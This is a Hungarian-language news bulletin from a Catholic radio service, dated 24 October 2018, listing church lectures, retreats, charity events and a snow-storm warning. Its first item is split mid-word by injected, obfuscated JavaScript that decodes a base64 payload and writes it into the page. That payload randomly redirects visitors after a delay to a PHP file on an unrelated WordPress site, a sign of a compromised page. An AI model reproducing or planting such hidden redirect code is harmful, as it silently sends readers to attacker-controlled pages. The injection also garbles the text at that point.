2018. október 24. – Hírek és programajánló

H Í R E K   D É L B E N

Keresztény Agora
Ismét előadásra kerül sor a szatmári Székesegyházi Plébánia szervezésében a Keresztény Agora Kulturális Kör keretében. Október 27-én, szombaton délelőtt 11 órakor András Szabolcs teológiai doktorfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andusz  fogja fejtegetni gondolatait: “Minden nap tapasztalhatjuk, hogy a politika a saját érdekeinek szolgálatába akarja felhasználni a vallást és az egyházat. A szakemberek között egyetértés van abban, hogy a politikai irányzatok közül a nacionalizmus építette ki a legszorosabb kapcsolatot az emberek hitvilágával, ezért az előadásban néhány példa szemléltetésével az kerül bemutatásra, hogy miként hatott egymásra a társadalom nemzeti és vallási önazonosság-tudata.” (András Szabolcs)  Az előadás címe: „A vallás és a nacionalizmus XX. századi találkozása térségünkben”.

Egymillió csillag a szegényekért
A Szatmári Egyházmegyei Caritas Szervezet tizedik alkalommal szervezi meg Szatmárnémetiben az Egymillió csillag elnevezésű nemzetközi szolidaritási akciót. A rendezvény az egymásra való odafigyelésre, a kölcsönös segítségnyújtás fontosságára szeretné felhívni a figyelmet, lehetőséget nyújtva a szociális problémákkal küzdő embertársaink iránti szolidaritás kifejezésére és erősítésére. A szervezők várnak minden segítő szándékú lakost október 26-án, délután hat órától a Tűzoltó-toronyhoz, hogy együtt gyújtsák meg az együttérzés és a törődés mécseseit. Az esemény helyszínén megvásárolt mécsesek árával a résztvevők a Caritas szociális szolgáltatásait támogatják.

Belső iránytű Gyergyószentmiklóson
A Belső iránytű programsorozat keretében október 26-án, pénteken este hét órától Sebestyén Péter marosvásárhelyi plébános, egyházi író tart előadást a gyergyószentmiklósi Szent István-plébánia nagytermében Isten mosolyában megfürödni. Gondolatok a szépségről címmel. Minden érdeklődőt várnak.

Örömszombat – lelkigyakorlat gyermekeknek Kolozsváron
A kolozsvári Szent Mihály plébánia szervezésében október 27-én, szombaton lelkigyakorlatot tartanak gyermekek számára a Manréza Lelkigyakorlatos Központban. A program délelőtt tíztől kezdődik és a négy órakor kezdődő szentmisével zárul, amelyre a szülőket is várják. További részletek Székely Beátától kaphatóak a 0749-993285-ös telefonszámon.

Búcsú Mindenszentek ünnepén
A Gyulafehérvári egyházmegyében, Szászfenesen október 27-én, szombaton délután 5 órakor ünneplik a plébániatemplom búcsúját. A szentmisén Csintalan László csíkdelnei plébános tartja a szentbeszédet. A liturgián a helyi szkóla és templom kórusa mellett közreműködik a kolozsvári Visszhang kórus Molnár Botond vezetésével. A szentmisét a  rádiónk élő adásban közvetíti.
A Csíktaplocai Mindenszenszentek plébániatemplom búcsús szentmiséjét október 28-án, vasárnap fél 1-kor tartják. Ünnepi szónok Urbán Erik OFM.

Továbbképzés a Marienheim házban
A temesvári Püspökség és az Egyházmegyei Ifjúsági Központ szervezésében a temesvári Marienheim ifjúsági házban november 5-7. között az egyházmegyei ifjúsági pasztorációban tevékenykedő lelkipásztorok és szerzetes nővérek számára továbbképző tanfolyamra kerül sor. A kurzus célja elsősorban a plébániákon folyó ifjúsági munka átfogóbb megszervezése, koordinálása. A tanfolyam előadásait Laslău Andrei SDB szaléziánus szerzetes tartja. A kurzus november 5-én, hétfőn 17 órakor kezdődik és 7-én, szerdán délben zárul.

Pénzügyi Fitnesz Marosvásárhelyen
November 10-én, szombaton ingyenes Pénzügyi Fitnesz-képzésre kerül sor nehéz anyagi helyzetben levőknek, amelyet a Telefonos Szeretetszolgálat az OK Center Romániával közösen szervez.
A felnőtt képzés a pénz fogalmát járja körül, hitelek, bankszámlák, bankkártyák, megtakarítások és biztosítások témáját boncolgatja majd. Segítséget nyújt a pénzbeosztással küzdőknek a banki hitel ésszerű kezelésében, és különféle mai pénzügyi kérdésekben. Jelentkezési határidő november 7. A helyek száma korlátozott, a bejelentkezés sorrendjében fogadják a jelentkezőket, valamint kérdéseiket a 0720  565656-os telefonszámon.

Lelkigyakorlat Székelyudvarhelyen
November 10-11. között a Szent Pio Lelkigyakorlatos Házban dr. Csókay András budapesti idegsebész és felesége, Daniella hiterősítő lelkigyakorlatot tart Hit és tapasztalat az élő igazságról címmel. Életkortól, szakmától függetlenül várnak minden érdeklődőt, aki a Jóistennel való kapcsolatát szeretné mélyíteni, valamint munkálni azt a belső érzékenységet, hogy Isten hívását a hétköznapok zajában is meghallhassa. Előzetes bejelentkezés szükséges november 6-ig. Bővebb információ a 0266 210 537-es és a 0755 489743-as telefonszámokon, illetve a hazpio@gmail.com e-mail-címen kapható.

Időjárás: Az Országos Meteorológiai Szolgálat kedden 22 órától érvényes, havazásra és hóviharra vonatkozó figyelmeztető előrejelzést adott ki a magashegyi régiókra. Eszerint kedd este 10 és ma este 10 óra között, a Keleti- és Déli-kárpátokban, valamint a Kárpát-kanyarban havazni fog, főleg az 1 500 méternél magasabb régiókban; a szél megerősödik, felkavarja a havat, a látótávolság erősen lecsökken. Az 1 800 méternél magasabb részeken az óránként 90 kilométeres sebességű szél hóvihart okoz. Országszerte esni fog, a lehulló csapadékmennyiség elérheti négyzetméterenként a 15, elszigetelten, főleg dombvidéken, a 25-30 litert négyzetméterenként.

MRE - Hírszolgálat, 2018. október 24.


H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Mezőbándon tartják az örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra, imádkozzunk örömmel és hálával a kenyér színe alatt rejtőző Üdvözítő jelenlétében.

Könyvbemutató Kolozsváron: 80 évemből kereken 50 Kerekdombon
A kolozsvári Szent Mihály Plébánia keretében működő Keresztény Értelmiségi Kör meghívására a Szent Mihály Nőszövetség dísztermében október 26-án, pénteken este hét órakor bemutatják Jakab Gábor pápai káplán, plébános 80 évemből kereken 50 Kerekdombon című kötetét. A szerzővel Bodó Márta kiadói főszerkesztő, a Keresztény Szó felelős szerkesztője beszélget.

Kórustalálkozó Kézdivásárhelyen
A IV. felsőháromszéki római katolikus gyermekszkólák és kórusok találkozóját a kézdivásárhelyi Boldog Özséb-templomban tartják szombaton, október 27-én. Az esemény délelőtt fél 12-kor szentmisével kezdődik.

Házaspárok lelkigyakorlata
A Gyulafehérvári Családpasztorációs Központ szervezésében lelkigyakorlat lesz házaspároknak Gyergyószentmiklóson október 26-28. között. A lelkigyakorlat mottója „Istennel és egymással az életen át,” vezetője pedig Solomayer Sándor atya, szatmárnémeti plébános. A program folyamán gondolatébresztők, személyes és közösségi ima- és elmélkedési idők, páros és csoportos beszélgetések, kreatív módszerek segítik az élet Istenével, önmagukkal és egymással való mélyebb találkozást. Jelentkezni a csalad.ro honlapon lehet ma estig. A mai Déli Magazinban bővebben hallhatnak.

Filmvetítés Gyergyóalfaluban
A gyergyóalfalvi plébániatemplomban október 28-án, vasárnap este hét órától a székelyudvarhelyi Nagy Zoltán bemutatja a kolozsvári Verbum Kiadónál megjelent A Hegy című, háromlemezes DVD-összeállítást Márton Áron püspök életéről. A filmvetítés során az eredeti 330 perces filmből egy 60 perces részletet láthatnak az érdeklődők. A vetítés a gyergyóalfalvi őszi búcsús program része. Minden érdeklődőt szeretettel várnak.

Háló találkozó Brassóban
„Bölccsé teszlek és megtanítalak melyik úton kell járnod” mottóval szerveznek Háló találkozót november 3-án, Brassóban, a Szent Imre házban. Meghívott előadó Szénégető István, marosvásárhely-remeteszegi plébános. A program reggel nyolc és délután hat óra között zajlik. Jelentkezni október 29-ik lehet a blamatisa@yahoo.com email címen, vagy SMS-ben a 0724-512290-es telefonszámon.

Továbbképzés a Marienheim házban
A temesvári Püspökség és az Egyházmegyei Ifjúsági Központ szervezésében a temesvári Marienheim ifjúsági házban november 5-7. között az egyházmegyei ifjúsági pasztorációban tevékenykedő lelkipásztorok és szerzetes nővérek számára továbbképző tanfolyamra kerül sor. A kurzus célja elsősorban a plébániákon folyó ifjúsági munka átfogóbb megszervezése, koordinálása. A tanfolyam előadásait Laslău Andrei SDB szaléziánus szerzetes tartja. A kurzus november 5-én, hétfőn 17 órakor kezdődik és 7-én, szerdán délben zárul.

Ad limina látogatás Rómában
November 5-11. között Pál József Csaba megyés püspök a Romániai Püspökkari Konferencia többi tagjával együtt ad limina látogatást tesz a Vatikánban. Az ad limina látogatásra ötévente kerül sor, amely alkalomból a jelen lévő püspökök beszámolnak az általuk irányított egyházmegye általános helyzetéről és az ott folyó különböző tevékenységekről. Ugyanakkor lehetőség nyílik a Ferenc pápával való személyes találkozásra is.

Pénzgazdálkodás az ificsoportban
A Pro Educatione és a Főegyházmegyei Ifjúsági Főlelkészség közös szervezésében, egy 2X3 órás képzést tartanak az ificsoportok számára november 8-án és 15-én. Körüljárják a közösségekben felmerülhető gazdasági, pénzügyi kérdéseket, problémákat. Jelentkezés a romkat.ro oldalon lehetséges, november 4-ig!

Lelkigyakorlat Székelyudvarhelyen
November 10-11. között a Szent Pio Lelkigyakorlatos Házban dr. Csókay András budapesti idegsebész és felesége, Daniella hiterősítő lelkigyakorlatot tart Hit és tapasztalat az élő igazságról címmel. Életkortól, szakmától függetlenül várnak minden érdeklődőt, aki a Jóistennel való kapcsolatát szeretné mélyíteni, valamint munkálni azt a belső érzékenységet, hogy Isten hívását a hétköznapok zajában is meghallhassa. Előzetes bejelentkezés szükséges november 6-ig. Bővebb információ a 0266 210 537-es és a 0755 489743-as telefonszámokon, illetve a hazpio@gmail.com e-mail-címen kapható.

Időjárás: Az Országos Meteorológiai Szolgálat kedden 22 órától érvényes, havazásra és hóviharra vonatkozó figyelmeztető előrejelzést adott ki a magashegyi régiókra. Eszerint kedd este 10 és szerda este 10 óra között, a Keleti- és Déli-kárpátokban, valamint a Kárpát-kanyarban havazni fog, főleg az 1 500 méternél magasabb régiókban; a szél megerősödik, felkavarja a havat, a látótávolság erősen lecsökken. Az 1 800 méternél magasabb részeken az óránként 90 kilométeres sebességű szél hóvihart okoz. Országszerte esni fog, a lehulló csapadékmennyiség elérheti négyzetméterenként a 15, elszigetelten, főleg dombvidéken, a 25-30 litert négyzetméterenként.

MRE - Hírszolgálat, 2018. október 24.

About the author

maradmin

Leave a Comment